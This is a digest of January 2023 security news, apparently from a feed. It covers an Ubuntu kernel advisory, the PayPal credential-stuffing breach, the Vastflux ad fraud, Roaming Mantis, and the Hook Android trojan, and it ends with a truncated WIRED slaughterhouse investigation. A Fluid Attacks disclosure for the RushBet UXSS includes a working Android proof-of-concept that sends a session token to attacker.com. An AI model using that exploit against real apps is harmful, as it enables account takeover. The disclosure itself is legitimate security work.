Ubuntu Security Notice 5815-1 - It was discovered that a race condition existed in the Android Binder IPC subsystem in the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. David Leadbeater discovered that the netfilter IRC protocol tracking implementation in the Linux Kernel incorrectly handled certain message payloads in some situations. A remote attacker could possibly use this to cause a denial of service or bypass firewall filtering.

==========================================================================  
Ubuntu Security Notice USN-5815-1  
January 19, 2023

linux-bluefield vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-bluefield: Linux kernel for NVIDIA BlueField platforms

Details:

It was discovered that a race condition existed in the Android Binder IPC  
subsystem in the Linux kernel, leading to a use-after-free vulnerability. A  
local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2022-20421)

David Leadbeater discovered that the netfilter IRC protocol tracking  
implementation in the Linux Kernel incorrectly handled certain message  
payloads in some situations. A remote attacker could possibly use this to  
cause a denial of service or bypass firewall filtering. (CVE-2022-2663)

It was discovered that the Intel 740 frame buffer driver in the Linux  
kernel contained a divide by zero vulnerability. A local attacker could use  
this to cause a denial of service (system crash). (CVE-2022-3061)

It was discovered that the sound subsystem in the Linux kernel contained a  
race condition in some situations. A local attacker could use this to cause  
a denial of service (system crash). (CVE-2022-3303)

Gwnaun Jung discovered that the SFB packet scheduling implementation in the  
Linux kernel contained a use-after-free vulnerability. A local attacker  
could use this to cause a denial of service (system crash) or possibly  
execute arbitrary code. (CVE-2022-3586)

It was discovered that the NILFS2 file system implementation in the Linux  
kernel did not properly deallocate memory in certain error conditions. An  
attacker could use this to cause a denial of service (memory exhaustion).  
(CVE-2022-3646)

Hyunwoo Kim discovered that an integer overflow vulnerability existed in  
the PXA3xx graphics driver in the Linux kernel. A local attacker could  
possibly use this to cause a denial of service (system crash).  
(CVE-2022-39842)

It was discovered that a race condition existed in the EFI capsule loader  
driver in the Linux kernel, leading to a use-after-free vulnerability. A  
local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2022-40307)

Zheng Wang and Zhuorao Yang discovered that the RealTek RTL8712U wireless  
driver in the Linux kernel contained a use-after-free vulnerability. A  
local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2022-4095)

It was discovered that the USB monitoring (usbmon) component in the Linux  
kernel did not properly set permissions on memory mapped in to user space  
processes. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2022-43750)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   linux-image-5.4.0-1054-bluefield  5.4.0-1054.60  
   linux-image-bluefield           5.4.0.1054.50

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-5815-1  
   CVE-2022-20421, CVE-2022-2663, CVE-2022-3061, CVE-2022-3303,  
   CVE-2022-3586, CVE-2022-3646, CVE-2022-39842, CVE-2022-40307,  
   CVE-2022-4095, CVE-2022-43750

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-bluefield/5.4.0-1054.60

Ubuntu Security Notice USN-5815-1

By Habiba Rashid
According to PayPal, hackers managed to access the personal information of 34,942 users; however, no transactions were performed from the breached accounts.
This is a post from HackRead.com Read the original post: PayPal Notifies 35,000 Users of Data Breach

PayPal claims that this was not a result of a breach in its systems, since no evidence suggests that the user credentials were obtained directly from them.

On Thursday, January 19th, 2023, **PayPal** began contacting nearly 35,000 users with a data breach notification, explaining that their accounts had been hacked between December 6th and 8th, 2022.

The company was able to detect and mitigate the attack as soon as it occurred, but the conclusive investigation was not finished until December 20th, 2022. At this point, they confirmed that the hackers had gained unauthorized access to the accounts using valid credentials.

PayPal claims that this was not a result of a breach in its systems, since no evidence suggests that the user credentials were obtained directly from them.

The hackers were able to access the accounts by using credential stuffing, whereby pairs of usernames and passwords sourced from data leaks are tried on various websites. With the help of bots, lists of credentials are inserted into login portals for various services. Users who employ the same password for multiple online accounts, known as password recycling, are most prone to credential-stuffing attacks.

According to the data breach notification by PayPal, 34,942 users have been affected by the incident. While unauthorized third parties had access to the accounts, they could view the following information about the account holders:

*   Full names
*   Dates of birth
*   Postal addresses
*   Social security numbers
*   Individual tax identification

According to Bleeping Computer’s **report**, transaction histories, connected credit or debit card details, and PayPal invoicing data are all accessible through the accounts, as well.

Screenshot: Bleeping Computer

PayPal claims to have taken quick action to limit the hackers’ access to the platform by resetting the passwords of all the affected accounts. Impacted users will receive a free, two-year identity monitoring service from **Equifax**.

PayPal further confirmed that the attackers did not attempt or manage to perform any transactions from the breached accounts.

> “We have no information suggesting that any of your personal information was misused as a result of this incident, or that there are any unauthorized transactions on your account.”
> 
> PayPal

In a conversation with Hackread.com, Jasson Casey, CTO at Beyond Identity said that “It’s no wonder the Verizon Data Breach Report 2022 found credentials were the most likely form of data to be compromised in both the US (66%) and EMEA (67%).

“If a threat actor can access legitimate credentials – even if they’re dumped in a dark web repository – they are only a few short, and in most cases, automated steps away from a successful intrusion,” Jasson added.

The CTO praised PayPal for its quick response and for mitigating the attack, but questioned whether merely changing passwords is the solution. “In this incident, the company is doing the best it can for its customers – strongly recommending they change their passwords. But passwords – whether unique or complex – are fundamentally flawed. More than 80% of data breaches are the direct result of passwords, with threat actors deploying compromised credentials in the first phase of their attack,” Jasson said.

**How to secure your PayPal account**

PayPal accounts are a great way to shop online and make payments, but this incident highlights the fact that they can also be **vulnerable to hackers**. It is important that PayPal users take steps to protect their accounts and personal information from potential theft.

To prevent unauthorized access, it is essential that PayPal users create a strong password with at least 8 characters and include a mix of numbers, symbols, upper-case letters, and lower-case letters.

It’s also recommended that users change the password periodically. Additionally, two-factor authentication **(2FA)** should be enabled on the account so that any suspicious activity will have an extra layer of security before it can be completed. Finally, users should check their accounts regularly for unusual activity or unauthorized transactions.

Using these tips can help ensure your PayPal account remains secure against potential threats or breaches.

1.  PayPal rejects account takeover vulnerability report
2.  Microsoft, PayPal & Facebook most phished brands
3.  Ransomware sends PayPal phishing link in ransom note
4.  Android malware found stealing its victims’ PayPal funds
5.  PayPal’s TIO Networks breach affects millions of customers

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

PayPal Notifies 35,000 Users of Data Breach

By Waqas
The ad fraud was discovered while the researchers were investigating an iOS application that had been heavily impacted by an app spoofing attack.
This is a post from HackRead.com Read the original post: Massive Ad Fraud Scheme Shut Down: 11 Million Phones Targeted

Dubbed VASTFLUX, the ad fraud had 1,700 apps spoofed, targeting 120 publishers on 11 million devices with 12 billion ad requests per day.

The cybersecurity researchers at HUMAN Security Inc. have announced the takedown of a sophisticated, organized, and large-scale ad fraud operation dubbed VASTFLUX.

HUMAN Security is among the world’s leading firms offering advanced defences against digital attacks. Previously, the company reported large-scale scams involving iOS and Android devices, such as **Scylla**, **PARETO**, **Methbot,** and **3ve**.

VASTFLUX is a combination of two terms that reflect its functionality. VAST represents the Digital Video Ad Serving Template exploited in this operation. The name Flux is inspired by the Fast Flux concept, which is an evasion tactic used by cybercriminals.

Team Satori from HUMAN discovered the operation when investigating an iOS application, which was heavily impacted by an **app spoofing attack**.

The researchers found it a highly sophisticated scheme in which cybercriminals exploited the limited signal available to the verification partners in their targeted environment, including in-app advertising mainly on iOS.

The ad fraud later evolved into spoofing bids on a particular platform to make them appear on another platform. This made cross-platform attacks impossible to deter. HUMAN worked with its partners in the HUMAN Collective to obtain further information into the fraud’s traffic volumes and verification tags used on their ads.

The team deployed three mitigation methods within two weeks to protect users from VASTFLUX before taking it down.

**Targeted Entities**

According to a **blog post** shared by HUMAN with Hackread.com, the fraudulent operation accounted for over 12 billion fake ad requests per day and affected around 11 million devices by running ads within apps. For this purpose, the perpetrators spoofed 1,700 apps targeting around 10 publishers.

This is HUMAN’s Satori Threat Intelligence and Research Team’s highest per day volume of an operation uncovered by this team. It even eclipsed Human’s previously discovered peak volumes in high-profile disruptions. This includes PARETO, Methbot, and 3ve.

**How Did the Attack Work?**

The attackers injected malicious **JavaScript code into digital ads**, which let fraudsters stack dozens of video ads upon each other and register views for ads that the user couldn’t see. HUMAN shut down this operation via a private takedown effort and protected the programming advertising ecosystem. However, the company is still monitoring its operations.

Malicious JS code (Credit: Satori Threat Intelligence and Research Team)

The company’s CISO, Gavin Reid, stated that VASTFLUX was a “technically impressive and incredibly concerning” operation because the fraudsters hijacked impressions of authentic apps, making it difficult for users to feel suspicious.

“Orchestrating a private takedown of this magnitude and severity is no small feat, and I want to take a moment to thank all involved, including the HUMAN Satori Threat Intelligence and Research Team, the team at clean.io and the industry leaders who make up The HUMAN Collective who are dedicated to making the programmatic ecosystem safe and HUMAN,” Reid said.

1.  Shazam flaw exposed location of Android, iOS users
2.  SolarWinds hackers exploited 0-day to hack iPhones
3.  European Spyware Vendor selling iOS Device Exploits
4.  Malicious SDK spying, defrauding users with iOS apps
5.  Facebook removes accounts for spreading iOS malware

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Massive Ad Fraud Scheme Shut Down: 11 Million Phones Targeted

**Woburn, MA – January 19, 2023 –** Today Kaspersky researchers reported on a new domain name system (DNS) changer functionality used in the infamous Roaming Mantis campaign. Cybercriminals have demonstrated they can use compromised public Wi-Fi routers to try to infect more Android smartphones with the campaign’s Wroba.o malware. Attackers used the new technique against users in South Korea, but it could be soon implemented in other countries as well. 

Roaming Mantis (a.k.a Shaoye) is a cybercriminal campaign first observed by Kaspersky in 2018. It uses malicious Android package (APK) files to control infected Android devices and steal device information. It also has a phishing option for iOS devices and cryptomining capabilities for PCs. The name of the campaign is based on its propagation via smartphones roaming between Wi-Fi networks, potentially carrying and spreading the infection.

**New DNS changer functionality to attack more users via public routers**

Kaspersky discovered that Roaming Mantis recently introduced a domain name system (DNS) changer functionality in Wroba.o (a.k.a Agent.eq, Moqhao, XLoader), the malware that was primarily used in the campaign. DNS changer is a malicious program that directs the device connected to a compromised Wi-Fi router to a server under the control of cybercriminals instead of a legitimate DNS server. On the malicious landing page, the potential victim is prompted to download malware that can control the device or steal credentials.

At the moment, the threat actor behind Roaming Mantis is exclusively targeting routers located in South Korea and manufactured by a very popular South Korean network equipment vendor. To identify them, the new DNS changer functionality gets the router’s IP address and checks the router’s model, compromising targeted ones by overwriting the DNS settings. In December 2022, Kaspersky observed 508 malicious APK downloads in the country (see the Table 1). 

An investigation of malicious landing pages found that attackers are also targeting other regions using smishing instead of DNS changers. This technique employs text messages to spread malicious links that direct the victim to a malicious site to download malware onto the device or steal user info via a phishing website. Japan topped the list of targeted countries with nearly 25,000 malicious APK downloads from the landings created by cybercriminals. Austria and France followed with roughly 7,000 downloads each. Germany, Turkey, Malaysia and India rounded out the list. Kaspersky researchers predict that the perpetrators may soon update the DNS changer function to target Wi-Fi routers in those regions as well. 

**Country**  

**Number of downloaded malicious APK** 

Japan

24,645

Austria

7,354

France

7,246

Germany

5,827

South Korea

508

Turkey

381

Malaysia

154

India

28

_Table 1. The number of malicious APK downloads per country based on investigation of malicious landing pages created within Roaming Mantis campaign, the first half of December 2022_

According to Kaspersky Security Network (KSN) statistics in September – December 2022, the highest detection rate of Wroba.o malware (Trojan-Dropper.AndroidOS.Wroba.o) was in France (54.4%), Japan (12.1%) and the U.S. (10.1%). 

“When an infected smartphone connects to ‘healthy’ routers in various public places like cafes, bars, libraries, hotels, shopping malls, airports, or even homes, Wroba.o malware can compromise these routers and affect other connected devices as well,” said Suguru Ishimaru, senior security researcher at Kaspersky. “The new DNS changer functionality can manage all device communications using the compromised Wi-Fi router, such as redirecting to malicious hosts and disabling updates of security products. We believe that this discovery is highly critical for the cybersecurity of Android devices because it is capable of being widely spread in the targeted regions.” 

To read the full report on newly implemented DNS changer functionality, please visit Securelist.com.

In order to protect your internet connection from this infection, Kaspersky researchers recommend the following:

*   Refer to your router’s user manual to verify that your DNS settings haven’t been tampered with or contact your ISP for support.

*   Change the default login and password for the admin web interface of the router and regularly update your router’s firmware from the official source.

*   Never install router firmware from third party sources. Avoid using third-party repositories for your Android devices.

*   Further, always check browser and website addresses to ensure they are legitimate; look for signs such as https when asked to enter data.

*   Consider installing a mobile security solution, such as Kaspersky, to protect your devices from these and other threats.

**About Kaspersky**

Kaspersky is a global cybersecurity and digital privacy company founded in 1997. Kaspersky’s deep threat intelligence and security expertise is constantly transforming into innovative security solutions and services to protect businesses, critical infrastructure, governments and consumers around the globe. The company’s comprehensive security portfolio includes leading endpoint protection and a number of specialized security solutions and services to fight sophisticated and evolving digital threats. Over 400 million users are protected by Kaspersky technologies and we help 240,000 corporate clients protect what matters most to them. Learn more at usa.kaspersky.com.

Roaming Mantis Uses DNS Changers to Target Users via Compromised Public Routers

Some 1,700 spoofed apps, 120 targeted publishers, 12 billion false ad requests per day—Vastflux is one of the biggest ad frauds ever discovered.

Every time you open an app or website, a flurry of invisible processes takes place without you knowing. Behind the scenes, dozens of advertising companies are jostling for your attention: They want their ads in front of your eyeballs. For each ad, a series of instant auctions often determines which ads you see. This automated advertising, often known as programmatic advertising, is big business, with $418 billion spent on it last year. But it’s also ripe for abuse.

Security researchers today revealed a new widespread attack on the online advertising ecosystem that has impacted millions of people, defrauded hundreds of companies, and potentially netted its creators some serious profits. The attack, dubbed Vastflux, was discovered by researchers at Human Security, a firm focusing on fraud and bot activity. The attack impacted 11 million phones, with the attackers spoofing 1,700 app and targeting 120 publishers. At its peak, the attackers were making 12 billion requests for ads per day.

“When I first got the results for the volume of the attack, I had to run the numbers multiple times,” says Marion Habiby, a data scientist at Human Security and the lead researcher on the case. Habiby describes the attack as both one of the most sophisticated the company has seen and the largest. “It is clear the bad actors were well organized and went to great lengths to avoid detection, making sure the attack would run as long as possible—making as much money as possible,” Habiby says. 

Online and mobile advertising is a complex, often murky business. But it generates piles of money for those involved. Every day billions of ads are placed on websites and in apps—advertisers or ad networks pay to have their ads displayed and make money when people click on them or see them—and much of this is done as you open a website or an app.

Vastflux was first detected by Human Security researcher Vikas Parthasarathy in the summer of 2022 while he was investigating a different threat. Habiby says operating the fraud involved multiple steps, and the attackers behind it took a range of measures to avoid being caught out.

First, the group behind the attack—which Human Security hasn’t named due to ongoing investigations—would target popular apps and try to buy an advertising slot within them. “They were not trying to hijack an entire phone, or an entire app, they were literally going through one ad slot,” Habiby says. 

Once Vastflux won the auction for an ad, the group would insert some malicious JavaScript code into that ad to stealthily allow multiple video ads to be stacked on top of each other. 

Put simply, the attackers were able to hijack the advertising system so that when a phone was displaying an ad within an affected app, there would actually be up to 25 ads placed on top of each other. The attackers would get paid for each ad, and you would only see one ad on your phone. However, your phone battery would drain faster than usual as it processed all the fraudulent ads.

“It’s quite genius because the minute the ad disappears, your attack stops, which means that you’re not going to be found easily,” Habiby explains. 

The scale of this was colossal: In June 2022, at the peak of the group’s activity, it made 12 billion ad requests per day. Human Security says the attack primarily impacted iOS devices, although Android phones were also hit. In total, the fraud is estimated to have involved 11 million devices. There is little device owners could have done about the attack, as legitimate apps and advertising processes were impacted. 

Google spokesperson Michael Aciman says the company has strict policies against “invalid traffic” and there was limited Vastflux “exposure” on its networks. “Our team thoroughly evaluated the report’s findings and took prompt enforcement action,” Aciman says. Apple did not respond to WIRED's request for comment.

Mobile ad fraud can take many different forms. This can range, as with Vastflux, from types of ad stacking and phone farms to click farms and SDK spoofing. For phone owners, batteries dying quickly, large jumps in data use, or screens turning on at random times could be signs a device is being impacted by ad fraud. In November 2018, the FBI’s biggest ad fraud investigation charged eight men with running two notorious ad fraud schemes. (Human Security and other technology companies were involved in the investigation.) And in 2020, Uber won an ad fraud lawsuit after a company it hired to get more people to install its app did so through “click flooding.”

In the case of Vastflux, the biggest impact of the attack was arguably on those involved in the sprawling advertising industry itself. The fraud affected both advertising companies and apps that show ads. “They were trying to defraud all these different groups along the supply chain, with different tactics against very different ones,” says Zach Edwards, a senior manager of threat insights at Human Security. 

To avoid being detected—up to 25 simultaneous ad requests from one phone would look suspicious—the group used multiple tactics. They spoofed the advertising details of 1,700 apps, making it look like lots of different apps were involved in showing the ads, when only one was being used. Vastflux also modified its ads to only allow certain tags to be attached to adverts, helping it avoid detection. 

Matthew Katz, head of marketplace quality at FreeWheel, a Comcast-owned ad tech company that was partly involved in the investigation, says attackers in the space are becoming increasingly sophisticated. “Vastflux was an especially complicated scheme,” Katz says. 

The attack involved some significant infrastructure and planning, the researchers say. Edwards says Vastflux used multiple domains to launch its attack. The name Vastflux is based on “fast flux”—an attack type hackers use that involves linking multiple IP addresses to one domain name—and VAST, a template for video advertising, developed by a working group within the  Interactive Advertising Bureau (IAB), that was abused in the attack. (Shailley Singh, executive vice president, product and chief operating officer at IAB Tech Lab, says using the VAST 4 version of its template can help prevent attacks like Vastflux, and other technical measures from publishers and ad networks would help reduce its effectiveness.) “It’s not the very simple kind of fraud scheme that we see all the time,” Habiby says.

The researchers refused to reveal who may be behind the Vastflux—or how much money they potentially made—citing ongoing investigations. However, they say they’ve seen the same criminals running advertising fraud efforts as far back as 2020. In that instance, the ad fraud scheme was targeting US swing states and allegedly collecting users’ data.

For now, at least, Vastflux has been stopped. In June of last year, Human Security and several companies it has partnered with to take action against ad fraud began actively combating the group and the attack. Three separate disruptions of Vastflux took place during June and July 2022, dropping the number of ad requests from the attack to under a billion per day. “We identified the bad actors behind the operation and worked closely with abused organizations to mitigate the fraud,” the company said in a blog post.

In December, the actors behind the attack took down the servers, and Human Security hasn’t seen any activity from the group since then. Tamer Hassan, the firm’s CEO, says there are multiple actions people can take against criminal actors, some of which may lead to law enforcement action. However, money matters. Stopping attackers from profiting will reduce the attacks. “Winning the economic game is how we win as an industry against cybercriminals,” Hassan says.

_Update 11:55 am ET, January 19, 2023: Added comment from an IAB representative._

A Sneaky Ad Scam Tore Through 11 Million Phones

The threat actor behind the BlackRock and ERMAC Android banking trojans has unleashed yet another malware for rent called Hook that introduces new capabilities to access files stored in the devices and create a remote interactive session.
ThreatFabric, in a report shared with The Hacker News, characterized Hook as a novel ERMAC fork that's advertised for sale for $7,000 per month while featuring

Mobile Security / Android

The threat actor behind the BlackRock and ERMAC Android banking trojans has unleashed yet another malware for rent called **Hook** that introduces new capabilities to access files stored in the devices and create a remote interactive session.

ThreatFabric, in a report shared with The Hacker News, characterized Hook as a novel ERMAC fork that's advertised for sale for $7,000 per month while featuring "all the capabilities of its predecessor."

"In addition, it also adds to its arsenal Remote Access Tooling (RAT) capabilities, joining the ranks of families such as Octo and Hydra, which are capable performing a full Device Take Over (DTO), and complete a full fraud chain, from PII exfiltration to transaction, with all the intermediate steps, without the need of additional channels," the Dutch cybersecurity firm said.

A majority of the financial apps targeted by the malware are located in the U.S., Spain, Australia, Poland, Canada, Turkey, the U.K., France, Italy, and Portugal.

Hook is the handiwork of a threat actor known as DukeEugene and represents the latest evolution of ERMAC, which was first disclosed in September 2021 and is based on another trojan named Cerberus that had its source code leaked in 2020.

"Ermac has always been behind Hydra and Octo in terms of capabilities and features," ThreatFabric researcher Dario Durando told The Hacker News via email. "This is also known among threat actors, who prefer these two families above Ermac."

"The lack of some sort of RAT capabilities is a major issue for a modern Android Banker, as it does not provide the possibility to perform Device Take Over (DTO), which is the fraud methodology that is most likely to be successful and not detected by fraud scoring engines or fraud analysts. This is most likely what triggered the development of this new malware variant."

Like other Android malware of its ilk, the malware abuses Android's accessibility services APIs to conduct overlay attacks and harvest all kinds of sensitive information such as contacts, call logs, keystrokes, two-factor authentication (2FA) tokens, and even WhatsApp messages.

It also sports an expanded list of apps to include ABN AMRO and Barclays, while the malicious samples themselves masquerade as the Google Chrome web browser to dupe unsuspecting users into downloading the malware:

*   com.lojibiwawajinu.guna
*   com.damariwonomiwi.docebi
*   com.yecomevusaso.pisifo

Among the other major features to be added to Hook is the ability to remotely view and interact with the screen of the infected device, obtain files, extract seed phrases from crypto wallets, and track the phone's location, blurring the line between spyware and banking malware.

ThreatFabric said the Hook artifacts observed so far in a testing phase, but noted it could be delivered via phishing campaigns, Telegram channels, or in the form of Google Play Store dropper apps.

"The main drawback of creating a new malware is usually gaining enough trust by other actors, but with the status of DukeEugene among criminals, it is very likely that this will not be an issue for Hook," Durando said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Android Users Beware: New Hook Malware with RAT Capabilities Emerges

RushBet version 2022.23.1-b490616d allows a remote attacker to steal customer accounts via use of a malicious application. This is possible because the application exposes an activity and does not properly validate the data it receives.

**Summary**

**Name**

RushBet 2022.23.1-b490616d - UXSS

**Code name**

Miller

**Product**

RushBet

**Affected versions**

Version 2022.23.1-b490616d

**State**

Public

**Release date**

2023-01-10

**Vulnerability**

**Kind**

Universal XSS

**Rule**

429\. Universal XSS (UXSS)

**Remote**

Yes

**CVSSv3 Vector**

CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N

**CVSSv3 Base Score**

6.0

**Exploit available**

Yes

**CVE ID(s)**

CVE-2022-4235

**Description**

RushBet version 2022.23.1-b490616d allows a remote attacker to steal customer accounts via use of a malicious application. This is possible because the application exposes an activity and does not properly validate the data it receives.

**Vulnerability**

This vulnerability occurs because the application exposes an activity and does not properly validate the data it receives.

**Exploitation**

To exploit this vulnerability, the victim must have a malicious application installed with activity like the following:

**MainActivity.java**

    package com.example.badapp;
    
    import androidx.appcompat.app.AppCompatActivity;
    import android.content.Intent;
    import android.os.Handler;
    import android.os.Bundle;
    import android.net.Uri;
    
    public class MainActivity extends AppCompatActivity {
    
        @Override
        protected void onCreate(Bundle savedInstanceState) {
            super.onCreate(savedInstanceState);
    
            Intent intent = new Intent("android.intent.action.VIEW");
            intent.setClassName("com.rush.co.rb","com.sugarhouse.casino.MainActivity");
            intent.setData(Uri.parse("https://rushbet.co/"));
            startActivity(intent);
    
            new Handler().postDelayed(() -> {
                intent.setAction("Action.EvaluateScript");
                intent.putExtra("KeyScript","fetch('https://attacker.com/sessionID/'+JSON.parse(sessionStorage.getItem('session-COP')).value);");
                startActivity(intent);
            }, 30000);
        }
    }
    

Thus, when the victim opens the malicious app, the exploit will be executed, thus hacking his account.

**Evidence of exploitation**

POC-Account-Takeover-Rushbet

**Our security policy**

We have reserved the CVE-2022-4235 to refer to this issue from now on.

*   https://fluidattacks.com/advisories/policy/

**System Information**

*   Version: RushBet 2022.23.1-b490616d
    
*   Operating System: GNU/Linux
    

**Mitigation**

An updated version of RushBet is available at the vendor page.

**Credits**

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

**References**

**Vendor page** https://www.rushbet.co

**Timeline**

2022-11-29

Vulnerability discovered.

2022-11-30

Vendor contacted.

2022-12-03

Vendor replied acknowledging the report.

2022-12-03

Vendor Confirmed the vulnerability.

2022-12-14

Vulnerability patched.

2023-01-10

Public Disclosure.

CVE-2022-4235: RushBet 2022.23.1-b490616d - Universal XSS | Advisories | Fluid Attacks

Animal rights activists have captured the first hidden-camera video from inside a carbon dioxide “stunning chamber” in a US meatpacking plant.

At 4 am one morning in October of last year, animal rights activist Raven Deerbrook sat on a bed in a cheap hotel in East Los Angeles, looking at a live video feed on her phone. She’d barely slept that night, waking every hour or two to check that the feed was transmitting from three pinhole infrared cameras she’d hidden in the Farmer John meatpacking plant 20 miles away. The facility, located in the LA suburb of Vernon, is owned by Smithfield Foods, the largest pork producer in the world. She waited, both anticipating and dreading what her cameras were about to reveal.

A day earlier, Deerbrook had snuck into the slaughterhouse with a fake uniform and badge and climbed 26 feet underground into a “stunning chamber”—essentially a three-story-deep elevator shaft designed to be filled with carbon dioxide. Here, pigs in cages are lowered into the shaft’s invisible swimming pool of suffocating, heavier-than-air CO2, where the animals asphyxiate over a matter of minutes before being dumped out of the chamber onto a conveyor belt, hung up, drained of blood, and butchered.

Deerbrook had hidden one camera pointed at that chamber from the plant’s wall. She’d mounted two more with microphones on the car-sized cages within. When she’d tried to descend further down the shaft’s ladder, a burning “air hunger” from residual CO2 in the chamber had forced her to climb out again, gasping for breath, unable to plant her remaining cameras.

Safely back in her hotel room across the city, Deerbrook hoped to record the slaughterhouse gas chamber, inside and out, for the first time in a US meat plant. In doing so, she aimed to disprove claims from the pork industry and the gas chamber manufacturer that this form of suffocation represents a humane—even “painless”—form of killing.

At 5:25 am, as the plant’s operations began for the morning, she saw the first half-dozen pigs herded into the chamber. Deerbrook’s first thoughts were a mix of excitement and practical anxieties: Were the camera angles right? Was the frame rate high enough?

Then the light in the video began to dim as the cage lowered into the carbon dioxide below. As Deerbrook watched, the pigs began to squeal and thrash violently around in the cage, struggling to escape and convulsing for nearly a minute before finally laying still. “Pigs are very human-like in their screaming. And I wasn’t expecting to see them suffer for so long,” she says. “I knew it was going to be bad. But I wasn’t really prepared for the screaming.”

Deerbrook, still in her pajamas, sat on the hotel bed, staring at her phone screen in horror. The images and audio that she recorded would haunt her nightmares for months to come. “The only silver lining was the fact that I was able to download the footage,” she says. “Because once I started getting those first video clips, I knew: At least this is going to be documented.”

_**Warning: The following video depicts the killing of pigs in a CO2 gas chamber. Viewer discretion is advised.**_

Today, Direct Action Everywhere, the group of animal rights activists Deerbrook belongs to, released the footage on a new website, StopGasChambers.org, after providing the videos to WIRED in advance. The recordings are the first to reveal what really happens inside a US pig slaughterhouse gas chamber: They capture the truth of a method of animal slaughter that already dominates the meat industry in many countries around the world and is quickly growing among large-scale American meatpacking plants.

The videos also show how repurposed surveillance technology is making it harder than ever for the meat industry to hide the details of its animal slaughter from the public: Direct Action Everywhere’s activists used tiny spy cameras smaller than a coin to capture the footage. The entire setup—including enough batteries for days of recording, an infrared LED, a microphone, and a radio chip for transmitting the video in real time—is smaller than a credit card.

Direct Action Everywhere, or DxE, says its latest videos contradict claims from the animal agriculture industry and the Iceland-based gas chamber manufacturer Marel—which sold the system used in the Farmer John meatpacking plant—that CO2 asphyxiation of pigs improves animal welfare and reduces suffering. A group of 10 veterinarians who have seen DxE’s recordings have also signed an open letter to the American Veterinary Medicine Association, published today, that argues based on the footage that the chambers likely violate US state and federal law governing animal slaughter.

Direct Action Everywhere’s 3D reconstruction of a Marel “stunning chamber” of the kind used in pig slaughterhouses.Courtesy of Direct Action Everywhere

CO2 “stunning chambers”—a euphemism, perhaps, given that some experts say pigs usually die in them—have become increasingly commonplace in slaughterhouses around the world. They’re widespread in Europe and Australia and increasingly used in large US slaughterhouses, due to both their efficiency and their claimed benefits for animal welfare. Marel states on its website that its gas chambers can “stun” as many as 1,600 pigs an hour, and that the “stress-free” experience for animals improves the quality of their meat compared with older methods, such as the stunning by electrocution that was previously used in many US slaughterhouses. On its website, Smithfield Foods claims that its CO2 chambers lead to “painless loss of consciousness and death.”

Deerbrook argues that her video of pigs squealing and fighting for air entirely contradicts any such claim. “It’s an incredibly cruel and inhumane way to kill,” she says, adding, “When you see cows shot in the head or chickens being cut open while they’re still conscious, it’s really bad. But they don’t scream.”

DxE’s footage isn’t the first time that the inside of a slaughterhouse’s CO2 stunning chamber has been captured on video. In 2014, the Australian animal rights group Aussie Farms was the first to use hidden cameras to capture similar footage of pigs squealing and thrashing before collapsing inside a smaller gas chamber in a slaughterhouse in New South Wales. But DxE’s videos represent the first time such footage has been captured inside the US—evidence DxE hopes to use to make the case that the CO2 chambers violate US law.

Comparing the hidden cameras DxE used in its new investigation to those of Australian activists nearly nine years earlier also shows the evolution of the cat-and-mouse game between animal rights activists and the animal agriculture industry. Aussie Farms used pinhole cameras, like DxE, but had to connect them to digital video recorders nearly the size of a laptop—and then, because the cameras didn’t transmit the footage wirelessly, had to sneak back into the slaughterhouses to retrieve the devices that stored their recordings.

A tiny infrared spy camera of the kind Direct Action Everywhere hid inside the Farm John slaughterhouse, complete with a microphone, infrared LED, and battery pack.

Photograph: Direct Action Everywhere

Deerbrook also used tiny cameras, specifically ones produced by Sony that are sometimes sold to law enforcement for hidden camera surveillance. But she was able to power them for days with small lithium-ion batteries and connected them via Wi-Fi to a hotspot generated by an Android phone that she hid on the top of the Marel gas chamber. That allowed her to both miniaturize her setup—hiding it in a small box that looked like a part of Marel’s equipment—and remotely connect to the cameras from another phone, miles away, downloading the footage with no need to retrieve her devices.

That improved operational stealth is increasingly necessary, Deerbrook says, as slaughterhouses have become warier of activists, improving their physical security, tightening their access controls, and searching out hidden surveillance devices. In an earlier attempt in 2020, in fact, Deerbrook hid cameras without remote connectivity in a slaughterhouse gas chamber, but those were discovered before she could retrieve any footage.

When WIRED reached out to Smithfield Foods and shared DxE’s videos with the company, it responded in a statement that “Smithfield is committed to the safety, health, and comfort of our animals and strictly follows approved laws, regulations and best practices for humane animal stunning prior to harvest. We adhere to all humane handling and stunning regulations for livestock with the oversight of the United States Department of Agriculture Food Safety and Inspection Service.” The company pointed out that organizations like the USDA and the American Veterinary Medicine Association have recognized carbon dioxide gas chambers as complying with humane slaughter laws for years. It argued that “carbon dioxide stunning quickly renders hogs into a state of analgesia,” adding that its programs were “created in consultation with two of the world’s foremost experts in animal behavior and handling.” Gas chamber manufacturing firm Marel didn’t respond to WIRED’s request for comment.

Counter to Smithfield’s claims, several veterinarians, animal agriculture experts, and an animal welfare law professor who watched DxE’s videos and others from research studies agree that the kind of reaction captured in the footage represents an inhumane and even illegal degree of pain.

